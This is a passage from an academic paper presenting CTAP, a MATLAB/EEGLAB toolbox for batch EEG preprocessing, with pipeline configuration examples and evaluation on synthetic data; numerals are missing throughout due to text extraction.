less supplemental input from third parties. python tools include mne-python for processing meg and eeg data (gramfort et al., ) and pyeeg (bao, liu & zhang, ), a module for eeg feature extraction. mne, like brainstorm and fieldtrip, is primarily aimed at integrating eeg and meg data. several packages exist for the r computing environment, e.g. (tremblay & newman, ), however these do not seem to be intended as general-purpose tools.
(footnote: for example, we conducted a search of the scopus database for articles published after , with "eeg" and "electroencephalography" in the title, abstract or keywords, plus "signal processing" or "signal processing, computer-assisted" in keywords, and restricted to subject areas "neuroscience", "engineering" or "computer science". the search returned over hits, growing year-by-year from in up to a mean value of between and .)

however, ctap was designed to complement the existing eeglab ecosystem, not to provide a stand-alone preprocessing tool. this is an important distinction, because there exist some excellent stand-alone tools which work across data formats and platforms (bellec et al., ; ovaska et al., ); these features are valuable when collaborators are trying to work across, e.g. windows and linux, matlab and python. however, we do not see a need in this domain; rather we see a need in the much narrower focus on improving the command-line interface batch-processing capabilities of eeglab. we have chosen to extend eeglab because it has received many contributions to the core functionality, and is thus compatible with a good portion of the methods of eeg processing from the literature. some compatible tools from the creators of eeglab at the swartz centre for computational neuroscience (sccn) are detailed in delorme et al. ( ), including tools for forward head modelling, estimating source connectivity and online signal processing. other key third-party preprocessing contributions to eeglab include sasica (chaumon, bishop & busch, ), faster (nolan, whelan & reilly, ) and adjust (mognon et al., ), all semi-automated solutions for selection of artefactual data. in terms of similar tools, bigdely-shamlo et al. ( ) released the prep pipeline for matlab, which also uses the eeglab data structure. prep introduces specific important functionality for referencing the data, line noise removal and detecting bad channels. prep is aimed only at experiment-induced artefacts and not those deriving from subject activity such as, e.g. blinks, and is designed to be complementary to the various algorithm toolboxes for artefact-removal by focusing on early-stage processing. in a similar vein, ctap is intended to be complementary to existing toolboxes including prep. for example, methods from faster and adjust are featured in ctap as options for detecting bad data. this integration of existing solutions illustrates one core principle of ctap: it aims to extend an existing rich ecosystem of eeg-specific methods, by meeting a clear need within that ecosystem for a workflow management system. the ready-made automation of batching and bookkeeping gives the user a distinct advantage over the common approach of 'eeglab + a few scripts', which seems simple on its face, but in practice is non-trivial as the number and complexity of operations grows. as all algorithms added to ctap will produce quality control outputs automatically, fast performance comparison is possible between methods or method parameters, speeding the discovery of (locally) optimal solutions. the system has potential to enable such parameter optimisation by automated methods, although this is not yet implemented.

materials and methods

the core activity of ctap is preprocessing eeg data by cleaning artefacts, i.e. detection and either correction or removal of data that is not likely to be attributable to neural sources.
ctap is able to operate on three different temporal granularities: channel, epoch and segment. channel operations affect the entire time series at one spatial location. epoch operations are performed on one or several epochs produced by the eeglab epoching function. finally, segments are fixed time-windows around specific events which can be extracted from both channel and epoch levels, see fig. . an example of a typical segment could be a blink artefact with a window wide enough to include the entire blink waveform. further functionality is provided for independent component analysis (ica)-based methods. artefact-detection methods based on some flavour of ica algorithm have been shown to outperform temporal approaches (delorme, sejnowski & makeig, ). it was also shown that ics are valid representations of neural sources (delorme et al., ). ctap can thus help to combine the existing methods for eeg signal processing.

(footnote: also neuropype, a commercial python-based graphical programming environment for physiological signal processing; however, to the authors' knowledge, it has not been documented in a peer reviewed publication.)

[figure: relationship of the time domain data constructs dealt with in ctap.]

outline of usage

figure shows the core components of ctap. the coloured boxes represent entities that the user has to specify in order to use ctap. these are:

• what analysis functions to apply and in which order (analysis pipe)
• analysis environment and parameters for the analysis functions (configuration)
• which eeg measurements/files to process (measurement configuration)

typically, the analysis is run by calling a single script that defines all of the above and passes these on to the ctap_pipeline_looper.m function, which performs all requested analysis steps on all specified measurements. in the following, we describe in more detail how the configurations are made, how the pipe is executed, what outputs it provides and what options the user has to control the pipe. the complete details of all these aspects of ctap are provided in the wiki pages of the github repository (https://github.com/bwrc/ctap/wiki), which will be referenced below as 'the wiki'.

configuration

in ctap a large analysis is broken down into a hierarchical set of smaller entities: steps, step sets, pipes and branches. several analysis steps form a step set and an ordered sequence of step sets is called a pipe. pipes can further be chained to form branches. the smallest unit is the analysis step which might be e.g. a filtering or a bad channel detection operation. a step is represented by a single call to a ctap_*.m function. step sets and pipes are used to chop the analysis down into smaller chunks that are easy to move around if needed. intermediate saves are performed after each step set and therefore the organisation of steps into step sets also affects the way the pipe shows up on disk. intermediate saves provide a possibility to run the whole analysis in smaller chunks and to manually check the mid-way results as often as needed, e.g. while debugging. further on, the ability to create branches is important to help explore alternative ways of analysing the same data.
to specify the order of steps and sets within a pipe, we recommend creating a single m-file for each intended pipe. this file will define both the step sets as well as all the custom parameters to be used in the steps. default parameters are provided, but it is optimal to fine tune the behaviour by providing one's own parameters. both pipe and parameter information is handled using data structures, rather than hard-coding. ctap then handles assignment of parameters to functions based on name matching. for an example, see cfg_manu.m in the repository. once the steps and their parameters are defined, the last requirement to run the pipe is to define the input data. in ctap the input data are specified using a table-like structure called measurement config that lists all available measurements, the corresponding raw eeg files, etc. this dedicated measurement config data structure allows for an easy selection of what should be analysed and it also helps to document the project. it can be created manually or auto-generated based on a list of files or a directory. the former allows for full control and enforces project documentation whereas the latter is intended for effortless one-off analyses. both spreadsheet and sqlite formats are supported. in the last required step before pipeline execution, the configuration struct and the parameter struct are checked, finalised and integrated by cfg_ctap_functions.m.

[figure: an overview of the core logic of ctap. 'configuration', 'analysis pipe' and 'measurement config' illustrate the parts that a user must specify; white boxes represent matlab functions, with the function name on top. ctap_pipeline_looper() executes the pipe, handles errors, and loads and stores data; ctap_*.m wrappers enable pipe building and call the corresponding ctapeeg_*.m functions that implement each step, while standalone analysis functions (eegout = any_analysis_step(eegin)) can also be used outside the pipe.]

pipe execution

once all prerequisites listed above have been specified, the core ctap_pipeline_looper.m function is called to run the pipe. this function takes care of loading the correct (initial or intermediate) data set, applying the specified functions from each step set, and intermediate saving of the data. the looper manages error handling such that it is robust to crashing (unless in debug mode), and will simply skip the remaining steps for a crashed file. other settings determine how to handle crashed files at later runs of the pipe (see documentation). ctap_pipeline_looper.m is designed to accept functions named ctap_*.m, as these are defined to have a fixed interface. they take two arguments: data (eeg) and configuration struct (cfg); and they return the same after any operations. some ctap_*.m functions perform all operations (e.g. call eeglab functions) directly, while others call a corresponding ctapeeg_*.m function that actually implements the task.
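to illustrate the two-argument wrapper interface just described, here is a minimal sketch modelled on the idea of the provided template (ctap_template_function.m); the function name, the configuration field and the inner call are illustrative assumptions, not the actual ctap api.

function [EEG, Cfg] = CTAP_example_step(EEG, Cfg)
% minimal sketch of a ctap_*.m wrapper: take the eeg data and the
% configuration struct, apply one analysis step, return both.
% the field 'ctap.example_step' and some_analysis_step() are
% illustrative assumptions, not the real ctap interface.
    Arg = struct('threshold', 3);              % default parameters
    if isfield(Cfg, 'ctap') && isfield(Cfg.ctap, 'example_step')
        Arg = Cfg.ctap.example_step;           % user overrides from the pipe config
    end
    EEG = some_analysis_step(EEG, Arg);        % hypothetical implementation function
    Cfg.ctap.example_step = Arg;               % record the parameters actually used
end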
hence ctap_*.m functions can be regarded as wrappers that facilitate batch-processing by providing a uniform interface. they also implement, e.g. the plotting of quality control figures. since ctap_*.m functions are quite simple, new ones can easily be added by the user to include new analysis steps, working from the provided ctap_template_function.m. users can also call the ctapeeg_*.m functions directly as part of their own custom scripts, since these are meant to be used like any eeglab analysis function.

analysis results are saved separately for each pipe. a typical structure contains:
- intermediate results as eeglab datasets, in one directory per step set; names are taken from the step set ids as defined by the user, prefixed by step number.
- export directory contains exported feature data (txt, csv or sqlite format).
- features directory: computed eeg features in matlab format.
- logs directory: log files from each run.
- quality_control directory: quality control plots, reflecting the visualisations of analysis steps chosen by the user.

apart from running the complete pipe at once the user has many options to run just a subset of the pipe, analyse only certain measurements or otherwise adjust usage. table gives some examples.

analytic methods
as presented, ctap is primarily a framework for analysis management; however it contains a number of analysis functions, functions for evaluation and data-management functions including a way to generate synthetic datasets for testing (for details see function documentation). the user is easily able to add their preferred functions, but may note the available functions as a quick way to start. all provided functions, for analysis, evaluation or data-handling, have default parameters which may serve as a starting point. almost all eeg processing methods in ctap are either novel or rewritten from original source, usually because of the unintended side-effects of the original code, such as graphical pop-ups. thus the outputs are similar to those of original eeglab or other toolbox methods, but the code base is refactored. the highlights of available ctap_*.m functions include:
- functions to load data (and extract non-eeg data, e.g. ecg), events (and modify them) or channel locations (and edit them);
- functions to filter, subset select (by data indices or by events), re-reference, epoch or perform ica on the data;
- functions to detect artefactual data, in channels, epochs, segments or ica components, including:
  - variance (channels),
  - amplitude threshold (epochs, segments, ica components),
  - eeglab's channel spectra method (channels, epochs),
  - metrics from the faster toolbox (channels, epochs, ica components),
  - metrics from the adjust toolbox (ica components),
  - additionally bad data can be marked by events where detection is performed by some external method;
- functions to reject bad data, normalise or interpolate;
- functions to extract time and frequency domain features, and create visualisations of data (as described below).

table some advanced ways to use the pipe.
- subset step sets. possible reason: investigate a bug; recompute only intermediate results. how: set run sets to subset index, e.g. cfg.pipe.runsets = :
- run test step set. possible reason: test new feature before including in pipe. how: add step set with id 'test', then set cfg.pipe.runsets = 'test'
- 'rewire' the pipe. possible reason: test an alternative ordering of existing steps or temporarily change the input of some step. how: set the .srcid of a given step set equal to the id of another
- measurement configuration filter. possible reason: run pipe for subset of test subjects, or measurement classes with separate configurations, e.g. pilots. how: use function struct_filter.m
- run in debug mode. possible reason: develop new method in ctap. how: set ctap_pipeline_looper parameter 'debug', true
- overwrite obsolete results. possible reason: update part of pipe, writing new step set output over existing files. how: set ctap_pipeline_looper parameter 'overwrite', true
- write files from failed step sets. possible reason: check partial outcome of step set. how: set ctap_pipeline_looper.m parameter 'trackfail', true
- turn off intermediate saves. possible reason: extract numerical/visual analytics without producing updated files. how: set stepset(x).save = false; set stepset(x+1).srcid = stepset(x-1).id

outputs
ctap provides a number of novel outputs for evaluation and data management.
visual evaluation: ctap automatically produces plots that help the user to answer questions such as: what has been done, what the data looks like and was an analysis step successful or not. the following selected visualisations are illustrated in 'results':
- blinks: detection quality, blink erp
- bad segments: snippets of raw eeg showing detections
- eeg amplitudes: amplitude histograms, peeks
- filtering: psd comparison
- ica: ic scalp-map contact sheets, zoom-ins of bad components
quantitative evaluation: every major pipe operation writes a record to the main log file. data rejections, including channels, epochs, ics or segments, are summarised here and also tabulated in a separate 'rejections' log. values are given for how much data was marked as bad, and what percentage of the total was bad. if more than % of data is marked bad by a single detection, a warning is given in the main log. in addition, useful statistics of each channel are logged at every call to ctap_peek_data.m, based on the output of the eeglab function signalstat.m. data-points include trimmed and untrimmed versions of mean, median, standard deviation as well as skewness, kurtosis and normality testing. the set of statistics estimated for every data channel is saved in matlab table format and also aggregated to a log file.
feature export: extracted eeg features are stored internally as matlab structs that fully document all aspects of the data. these can be used to do statistical analysis inside matlab. however, often users like to do feature processing in some other environment such as r or similar. for this, ctap provides export functionality that transforms the eeg feature mat files into txt/csv text files, and/or an sqlite database. for small projects (e.g. up to subjects and channels) txt/csv export is feasible but for larger datasets sqlite is more practical.

system evaluation
to showcase what ctap can do we present in this paper the output of an example analysis using synthetic data. the example is part of the ctap repository; methods are chosen to illustrate the range of possibilities in ctap, rather than for the qualities of each method itself. thus, for example, we include the ctap-specific blink-correction method alongside simple amplitude thresholding, to exemplify different ways to handle artefacts.
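as a small illustration of the export format described under outputs above, the text export is an ordinary delimited table and can be read straight back into matlab or any other environment; the file and directory names here are assumed, not fixed by ctap:

% read one exported feature file for downstream statistics (file name illustrative)
feat = readtable(fullfile('export', 'eeg_features.csv'));
summary(feat)   % quick overview of the exported columns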
toy data
ctap provides a motivating example that can also be used as a starting point for one's own analysis pipe. the example is based on synthetically generated data with blink, myogenic (emg) and channel variance artefacts to demonstrate the usage and output of ctap. the example is part of the repository, and the details of the synthetic data generation process are documented in the wiki (https://github.com/bwrc/ctap/wiki/syndata-generation). briefly, synthetic data is generated from seed data using generate_synthetic_data_manuscript.m, which first converts the example dataset to eeglab-format and then adds artefacts to the data. seed data included in the repository is from the bci competition iv dataset (http://bbci.de/competition/iv/desc_ .html), recorded with brainamp mr plus at hz on channels. the generated min dataset is sampled at hz and has eeg channels, two mastoid channels and four eog channels. it occupies ∼ mb on disk. artefacts added to the data include blinks (generated by adding an exponential impulse of fixed duration, with amplitude that decreases linearly from front to rear of the scalp-map); and periods of emg (generated by adding a burst of noise across an arbitrary frequency band, at a high amplitude that decreases linearly away from a random centre-point). also six channels are 'wrecked' by randomly perturbing the variance, either very high (simulating loose electrodes) or very low (simulating 'dead' electrodes).

analysis steps
an example pipeline, described in the ctap repository in the file cfg_manu.m, is run on the synthetic data using runctap_manu.m. here, we describe the non-trivial analysis steps in order of application. for each step, we first describe the method; then the 'results' section shows the generated outcomes in terms of data quality control statistics and visualisations. the pipe below is shown to illustrate the context of the steps, and is an abridged version of the repository code.

stepset(1).id = '1_load';
stepset(1).funh = {@ctap_load_data, ...
                   @ctap_load_chanlocs, ...
                   @ctap_reref_data, ...
                   @ctap_peek_data, ...
                   @ctap_blink2event};
stepset(2).id = '2_filter_ica';
stepset(2).funh = {@ctap_fir_filter, ...
                   @ctap_run_ica};
stepset(3).id = '3_artifact_correction';
stepset(3).funh = {@ctap_detect_bad_comps, ...
                   @ctap_filter_blink_ica, ...
                   @ctap_detect_bad_channels, ...
                   @ctap_reject_data, ...
                   @ctap_interp_chan, ...
                   @ctap_detect_bad_segments, ...
                   @ctap_reject_data, ...
                   @ctap_run_ica, ...
                   @ctap_peek_data};

before-and-after 'peeks': the ctap_peek_data.m function is called near the start (after initial loading and re-referencing) and the end of the pipe. visual inspection of raw data is a fundamental step in eeg evaluation, and quantitative inspection of channel-wise statistics is also available. a logical approach is to compare raw data at the same time-points from before and after any correction operations. if ica-based corrections are made, the same approach can also be used on the raw ic data. ctap_peek_data.m expedites this work, and thus helps to regularise data inspection and facilitate comparison.
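outside the toolbox, the core of such a before-and-after comparison can be sketched with a plain eeglab call; pop_select is a standard eeglab function and the ten-second window here is purely illustrative:

% extract the same time window from the data before and after correction
win = [100 110];                                 % seconds, illustrative values
rawpeek   = pop_select(eegraw,   'time', win);   % eegraw: dataset before corrections
cleanpeek = pop_select(eegclean, 'time', win);   % eegclean: dataset after corrections
% the two snippets can then be plotted side by side for visual comparison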
ctap_peek_data.m will generate raw data plots and statistics of a set of time-points (points are generated randomly by default or can be locked to existing events). these 'peek-points' are embedded as events which can then generate peeks at a later stage in the pipe, allowing true before-and-after comparisons even if the data time course changes (due to removal of segments). if no peek-point data remains at the after-stage, no comparison can be made; however (especially if peek-points are randomly chosen), such an outcome is itself a strong indication that the data is very bad, or the detection methods are too strict. ctap_peek_data.m includes plotting routines for signal amplitude histograms as well as for raw eeg data. many eeg artefacts cause large changes in signal amplitudes, and consequently several basic, yet effective, eeg artefact detection methods are based on identifying samples exceeding a given amplitude threshold. on the other hand, even in controlled measurement conditions, individual baseline variation can affect the amplitude of the recorded signal. hence, accurate knowledge of the average signal amplitude is often important.

blink detection: the function ctap_blink2event.m is called early in the pipe to mark blinks. it creates a set of new events with latencies and durations matched to the detected blinks. the current blink detection implementation is based on a modified version of the eogert algorithm by toivanen, pettersson & lukander ( ) (see the code repository at https://github.com/bwrc/eogert). the algorithm finds all local peaks in the data, constructs a criterion measure and classifies peaks into blinks and non-blinks based on this measure.

filtering: ctap filtering produces plots of filter output and tests of functionality as standard. ctap_fir_filter.m uses the firfilt plug-in (https://github.com/widmann/firfilt) to do filtering, as it replaces the deprecated function pop_eegfilt.m and provides more sensible defaults; version . . of firfilt ships with eeglab. other ctap-supported filtering options are described in the documentation.

blink removal: blinks can either be rejected or corrected. we showcase correction using a method that combines blink-template matching and fir high-pass filtering of blink-related ics, following ideas presented by lindsen & bhattacharya ( ). the method is not part of eeglab, but an add-on provided by ctap; including all parts described here, this particular blink-correction method is unique to ctap. bad ica component detection is performed by first creating ics with ctap_run_ica.m (the default algorithm is fastica, requiring the associated toolbox on the user's matlab path), and then using one of several options from ctap_detect_bad_comps.m to detect artefactual ics. the blink template option compares mean activity of detected blink events to activations for each ic. ctap_filter_blink_ica.m is used to filter blink-related ic data, and reconstruct the eeg using the cleaned components. the success of the blink correction is evaluated using blink evoked response potentials (erps), which are simply erps computed for blink events (see e.g. frank & frishkoff, for details).

detect raw-data artefacts: bad channels were detected based on channel variance, with the function vari_bad_chans.m.
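the criterion this function applies is spelled out in the next paragraph; as a rough generic sketch of the same computation (not the toolbox's own code; mad requires the matlab statistics toolbox):

% log relative variance of each channel with respect to the median channel
chanvar = var(eegdata, 0, 2);              % eegdata: channels x samples matrix, illustrative
v = log(chanvar ./ median(chanvar));
% channels further than three median absolute deviations from the median are flagged
bad = abs(v - median(v)) > 3 * mad(v, 1);  % mad(v,1) = median absolute deviation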
log relative variance v was computed for all channels using the formula v = log(channel variance / median(channel variance)). values of v more than three median absolute deviations away from median(v) were interpreted as deviant and labelled as bad.

for bad segments, i.e. short segments of bad data over multiple channels, a common approach (in e.g., eeglab) is analysis of fixed length epochs, which is good for erp experiments. alternatively for working with continuous data, ctap also provides the option of amplitude histogram thresholding. many types of large artefacts can be easily found using simple histogram-based thresholding: a predefined proportion of most extreme amplitude values are marked as artefacts and segments are expanded around these. this can improve, e.g. ica analysis of low density eeg by freeing ics to capture neural source signals.

for all ctap_detect_bad_*.m functions, for whichever detection method option is used (user-defined options are also straightforward to add), a field is created in the eeg struct to store the results. another field collects pointers to all results detected before a rejection. this logic allows the user to call one or many detection functions, possibly pooling the results of several approaches to bad data detection, and then pass the aggregate results to the ctap_reject_data.m function.

rejection: ctap usage logic suggests that one or more detect operations for a given data type, e.g. channels, or epochs, or components, should be followed by a reject operation. it is bad practice to detect bad data across modalities, e.g. channels and epochs, before rejecting any of it, because artefacts of one type may affect the other. ctap_reject_data.m checks the detect field to determine which data type is due for rejection, unless explicitly instructed otherwise. based on the data labelled by prior calls to detection functions, ctap_reject_data.m will call an eeglab function such as pop_select.m to remove the bad data. upon rejection, the visualisation tools described are used to produce plots that characterise the rejected components. note that data rejection is only necessary if there exists no method to correct the data, e.g. as is provided for the ctap blink removal method. in that case the call to the ctap_detect_bad_*.m function is not followed by a call to ctap_reject_data.m, because the method corrects the artefactual ics rather than simply deleting them.

after peek: finally, the ctap_peek_data.m function is called again, providing comparator data at the same points as the initial peek call. a useful approach is to call ctap_run_ica.m again after all artefact correction steps. the resulting set of raw ic activations can be plotted by calling ctap_peek_data.m, and a careful examination should reveal the presence or absence of any remaining sufficiently large artefacts. this is a convenient way to, for example, determine whether the blink detection has identified all blink ics.

results
in this section, we show the output of ctap as applied to the synthetic dataset, based on the analysis-pipe steps shown above. the pipe outputs ∼ mb of eeg data after each step set, thus after debugging all steps can be expressed as one set, and data will occupy ∼ mb (before and after processing). additionally, the quality control outputs of this pipe occupy ∼ mb of space, mostly in the many images of the peek-data and reject-data functions.
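before turning to the results, the detect-then-reject pattern described above can be illustrated as one step set that pools two channel detectors before a single rejection; a sketch in the stepset notation of the example pipe (index, id and detection parameters are illustrative and would be defined in the configuration):

stepset(4).id   = '4_clean_channels';
stepset(4).funh = {@ctap_detect_bad_channels, ...   % e.g. variance-based detection
                   @ctap_detect_bad_channels, ...   % e.g. channel-spectra-based detection
                   @ctap_reject_data, ...           % pools the prior detections and rejects
                   @ctap_interp_chan};              % interpolate the removed channels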
before-and-after ‘peeks’ raw data: figure shows raw data before and after preprocessing. eeg amplitudes: the signal amplitude histograms of a sample of good and bad channels from the synthetic data set are shown in fig. . this can be useful for finding a suitable threshold for bad segment detection, or e.g. to detect loose electrodes. the post-processing plots show the improvement in channel normality. statistical comparison: some of the first-order statistics calculated for before-and- after comparisons are plotted in fig. , averaged over all channels. this method allows inspection of global change in the signal, which overall can be expected to become less broad (smaller range) and less variable (smaller sd) after cleaning of artefacts. a. b. figure raw eeg data centred around a synthetic blink (a) before preprocessing and (b) after preprocessing. the blinks have been largely removed and the eeg activity around blinks has remained intact. note that the y-axis scales differ slightly. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ blink detection the eogert blink detection process visualises the classification result for quality control purposes, as shown in fig. . such figures make it easy to spot possible misclassifications. in our example, all blinks inserted into the synthetic data were detected. figure eeg amplitude histograms for four channels (a) before preprocessing and (b) after preprocessing. fitted normal probability density function (pdf) is shown as red solid curve. upper and lower . % quantiles are vertical black solid lines; data inside these limits was used to estimate the trimmed standard deviation (sd) and normal pdf fitted using trimmed sd is shown as black solid curve. distribution mean is vertical dashed blue line. channel d has clearly been detected as bad, removed and interpolated. figure changes in channel statistics for range (a) and standard deviation (sd) (b). mean over channels is indicated using a dot and the range spans from th to th percentile. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ filtering figure shows one of the outputs of the fir filtering. this figure can be used to check that the filter has the desired effect on power spectrum and that its response to a unit step function is reasonable. figure scatter plot of the criterion used to detect blinks. horizontal-axis shows the criterion value while vertical-axis is random data to avoid over-plotting. the classification is done by fitting two gaussian distributions using the em algorithm and assigning labels based on likelihoods. figure a visual of filtering effects. (a) the effects of filtering on power spectrum, (b) the filter’s unit step response which can be used to assess, e.g. the filter’s effect on erp timings. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ blink removal bad ica component detection: an example of a plot for ica rejection is given in fig. , showing some basic properties of a blink-related ic. filter blink ic data: the erp-evaluated success of the blink correction is shown in fig. . the correction method clearly removes most of the blink activity. as blink related ics are corrected instead of rejected, effects on the underlying eeg are smaller. the result may have some remainder artefact (e.g. visible in fig. 
as small spikes after s in channels c , c ), which may motivate the complete removal of blink-related ics instead of filtering. detect and reject raw-data artefacts bad channels: in total bad channels were found which included all six ‘wrecked’ channels—this shows the algorithm is slightly greedy, which is probably preferable in the case of a high-resolution electrode set with over channels. bad channels are rejected and interpolated before proceeding (not plotted as it is a straightforward operation). bad segments: an example of bad segment detection, using simple histogram-based amplitude thresholding, is shown in fig. . in this case, the bad data is high amplitude emg but in a general setting, e.g. motion artefacts often exhibit extreme amplitudes. using these figures the user can quickly check what kind of activity exceeds the amplitude threshold in the dataset. of the emg artefacts inserted in the synthetic data, still existed at least partially, at the end of pipe. the low rejection percentage is due to the fact that emg is more of a figure independent component information plot for a blink-related ica component found using blink template matching. shown are (a) component scalp map, (b) power spectrum and (c) a stacked plot of the time series (using erpimage.m). (c) shows only first ms segments of the data. the synthetic blinks start at full seconds by design. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ change in frequency spectrum than in amplitude, yet the pipe looked for deviant amplitudes only. after peek the data comparisons after various artefact removal operations, figs. and , illustrate the success or failure of the pipe. of course there are a large number of permutations for how this can be done—it is the ctap philosophy to facilitate free choice among these options, with the least implementation overhead. additionally, the final plots of raw ic activations should show if there remains any artefacts in the data. for example, fig. shows a segment of raw data for the first / of ics for the synthetic dataset, with clear indications of issues remaining in the data. discussion we have presented ctap, an eeg preprocessing workflow-management system that provides extensive functionality for quickly building configurable, comparative, exploratory analysis pipes. already by shifting the researcher’s focus from scripting to analysis, ctap can help reduce human effort, subjectivity and consequent error. figure an example of the blink erp. (a) the blink-centred erp before correction with a clearly visible blink signal. (b) the same plot after correction. the blink is clearly removed but the underlying eeg remains largely unaffected because the correction was done in ic base. channel c shows highest blink amplitudes in the synthetic dataset. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ specifically, the system can reduce the work load of the user by streamlining analysis specification away from function coding. it can improve reliability and objectivity of the analysis by helping users treat each file in a dataset in a uniform, regular manner. ctap output can also be more easily reproduced because manual processing steps have been minimised. this enables the user to perform multiple comparative analyses for testing the robustness of the results against different preprocessing methods. 
philosophy, benefits and issues ctap provides many default parameters, and streamlines many features into a handful of wrapper functions. this is in order to facilitate rapid build and testing of analysis pipes. the philosophy is to prevent users becoming stuck in a single approach to the data because they have invested time in building the preprocessing code for it from scratch; or worse, because they have completed a laborious manual processing task and cannot afford to repeat it. computational testing for automated preprocessing structures pipes in function, argument specification files. this approach, instead of only making scripts that call the figure a bad data segment detected by histogram-based amplitude thresholding (ctap_detect_bad_segments.m). the -channel subset closest to the forehead is shown (c –c ). the red lines mark the area of the bad segment. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ required set of functions directly, has several benefits. function names and parameters become objects available for later processing, so one can operate on them, e.g. to record what was done to logs and to swap functions/parameters on the fly or to check the specification of the pipe. by specifying new approaches in new pipe files, and saving already-tried pipe files, one can treat the files as a record of attempted preprocesses. this record corresponds to the user’s perspective, and thus complements the additional history structure saved to the eeg file, which records all parameters for each operation not only those specified by the user. finally, the user should not usually rely on defaults (as given by ctap, eeglab or other toolboxes), because the optimal choice often depends on the data. this is also one reason to separately define pipeline and parameters. separating these as objects is convenient for e.g. testing multiple parameter configurations. a single script file per analysis approach is incompatible with parameter figure plot of raw ic activations after all processing steps. ic shows clear evidence of emg noise remaining; while ic may indicate a drifting channel. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ optimisation, because the number of different possible combinations begins to require a layer of code to manage the scripts—this is exactly what ctap provides. as different analysis strategies and methods can vary greatly, ctap was implemented as a modular system. each analysis can be constructed from discrete steps which can be implemented as stand-alone functions. as ctap is meant to be extended with custom analysis functions the interface between core ctap features and external scripts is well defined in the documentation. the only requirement is to suppress any pop-ups or gui-elements, which would prevent the automatic execution of the analysis pipe. it is also up to the user to call the functions in the right order. the system supports branching. this means that the analysis can from a tree-like structure, where some stage is used as input for multiple subsequent workflows. to allow this, any pipe can act as a starting point for another pipe. the ctap repository provides a simple example get the user going. for branches to appear, a bare minimum is a collection of three pipes of which one is run first. the other two both act on this output but in different ways. 
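a minimal sketch of such a branched setting, in matlab pseudo-structures (the struct layout and the ids are illustrative assumptions, not repository code; only the .srcid mechanism is taken from the usage table above):

% pipe 1: shared preprocessing; its step set output is saved to disk
pipe1.stepset(1).id   = '1_load_filter';
pipe1.stepset(1).funh = {@ctap_load_data, @ctap_fir_filter};
% pipes 2a and 2b: two alternative continuations, both reading pipe 1's saved output
pipe2a.stepset(1).srcid = '1_load_filter';
pipe2a.stepset(1).funh  = {@ctap_run_ica, @ctap_detect_bad_comps, @ctap_reject_data};
pipe2b.stepset(1).srcid = '1_load_filter';
pipe2b.stepset(1).funh  = {@ctap_detect_bad_segments, @ctap_reject_data};
% pipe 1 is run first; pipes 2a and 2b are then run on its output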
currently the user is responsible for calling the pipes of a branched setting in a meaningful order. however, this is straightforward to implement and having the analysis logic exposed in the main batch file makes it, e.g. easy to run only a subset of the branches. although ctap works as a batch-processing pipeline, it supports seamless integration of manual operations. this works such that the user can define a pipeline of operations, insert save points at appropriate steps and work manually on that data before passing it back to the pipe. the main extra benefit that ctap brings is to handle bookkeeping for all pipeline operations, such that manual operations become exceptional events that can be easily tracked, rather than one more in a large number of operations to manage. computationaltestingforautomatedpreprocessingneveroverridestheuser’sconfiguration options, even when these might break the pipe. for example, ctap_reject_data.m contains code to auto-detect the data to reject. however, the user can set this option explicitly, and can do so without having first called any corresponding detection function, which will cause preprocessing on that file to fail. allowing this failure to happen is the most straightforward approach, and ultimately more robust. combined with an informative error message the user gets immediate feedback on what is wrong with the pipe. on the other hand, ctap does provide several features to handle failure gracefully. as noted, the pipe will not crash if a single file has an unrecoverable error, although that file will not be processed further. this allows a batch to run unsupervised. then, because no existing outputs are overwritten automatically, one can easily mop-up the files that failed without redoing all those that succeeded, if the fault is identified. because pipes can be divided into step sets, tricky processes that are prone to failure can be isolated to reduce the overall time spent on crash recovery. ctap saves crashed files at the point of failure (by setting the parameter ‘trackfail’ in ctap_pipeline_looper.m), permitting closer analysis of the problematic data. in contrast to many analysis plug-ins built on top of eeglab, no gui was included in ctap. while guis have their advantages (more intuitive data exploration, easier as noted above, for this reason much original code has been refactored to avoid runtime-visible or focus-grabbing outputs. the ultimate aim is for ctap to interface directly to matlab functions to remove dependency on eeglab releases, while retaining compatibility with the eeglab data structure. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for novice users, etc.) there is a very poor return on investment for adding one to a complex batch-processing system like ctap. a gui also sets limits to configurability and can constrain automation if ctap is executed on a hardware without graphical capabilities. the absence of gui also makes the development of extensions easier as there are fewer dependencies to handle. in contrast to many other broad-focus physiological data analysis tools, ctap is designed to meet a very focused goal with a specific approach. this does however create some drawbacks. compared to scripting one’s own pipeline from scratch, there are usage constraints imposed by the heavy use of struct-passing interfaces. 
some non-obvious features may take time to master, and it can be difficult (albeit unnecessary) to understand the more complex underlying processes. computational testing for automated preprocessing is also built to enable easy further development by third parties, by using standardised interfaces and structures. this was a feature of original eeglab code, but contrasts with many of the eeglab-compatible tools released since, whose functionality was often built-in an ad hoc manner. the main requirement for development is to understand the content and purpose of the eeg.ctap field (which is extensively documented in the wiki), and the general logic of ctap. developers can easily extend the toolbox by using (or emulating) the existing ctapeeg\_�.m functions, especially the ctapeeg_detect_�.m functions, which are simply interfaces to external tools for detecting artefacts. existing ctap_�.m functions can be relatively more complex to understand, but the existing template provides a guideline for development with the correct interface. future work computational testing for automated preprocessing is far from finalised, and development will continue after the initial release of the software. the main aim of future work is to evolve ctap from workflow management towards better automation, with computational comparative testing of analysis methods, to discover optimal parameters and help evaluate competing approaches. as stated above, the potential to fully automate eeg processing is constrained by the indeterminacy of eeg: known as the inverse problem, this means that it is not possible to precisely determine a ground-truth for the signal, i.e. a unique relationship to neural sources. the signal can also be highly variable between individuals, and even between intra-individual recording sessions (dandekar et al., ). these factors imply that there cannot be a general algorithmic solution to extract neurally generated electrical field information from eeg, thus always requiring some human intervention. by contrast, for example in 